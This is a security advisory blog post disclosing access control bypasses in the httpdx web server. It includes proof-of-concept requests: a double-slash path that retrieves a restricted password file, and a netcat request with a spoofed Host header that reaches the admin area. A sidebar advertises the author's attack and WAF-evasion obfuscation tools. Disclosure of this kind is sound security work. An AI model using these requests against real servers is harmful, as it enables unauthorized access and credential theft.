Just Another Hacker
Author's avatar

httpdx multiple access control bypass

By Eldar Marcussen

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. [ Taken from: http://sourceforge.net/projects/httpdx/ ]

Vulnerability description

Access control in httpdx is done with string matching directives in the configuration file. Request variables are compared to static strings to determine if access should be granted. Examples provided in the default configuration include:

    if<%REQUEST_URI% == "/data/users.txt*">{
                    http.deny = 1;
                }

And another example:

    if<%REQUEST_URI% == "/admin.html*">{
                    http.auth = { //authorization needed for admin's section
                        user="admin",
                        pass="passw000",
                        realm="Stuff for admin only!"
                    };

As long as your request does not match these static strings, but the path resolves to the same files you can access the content.

Additionally, as the server doesn’t support traditional binding of virtualhosts to network interfaces you must configure virtualhost specific behaviour through similar string matching directives.

    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{

The variable HTTP_HOST is set from the Host: header in the request, so in order to access the localhost virtualhost remotely, just set your Host: header to localhost.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: httpdx - http://sourceforge.net/projects/httpdx/
  • Affected versions: 1.5.5, 1.5.4 and probably earlier versions

Proof of Concept

The server comes with two examples of access control, a restricted file and a password protected administrator area running on localhost. The following examples successfully access these restricted areas remotely:

Access user file:

user@~$ GET http://192.168.58.135/data//users.txt
            user1=pass123
            user2=pass321

Access admin console:

user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
            HTTP/1.1 200 OK
            Date: Thu, 08 Nov 2012 03:25:58 GMT
            Content-Type: text/html
            Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
            Content-Length: 36
            Connection: close
            Server: httpdx/1.5.4 (Win32)
            Pragma: no-cache

Ok, you’re now at admin’s section.

Solution

The software appears to be abandoned and the same versions suffers from remote code execution bugs. Use different software instead.

Disclosure time line

  • 12-Feb-2013 - Public disclosure

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!

⠓⠁⠉⠅⠑⠗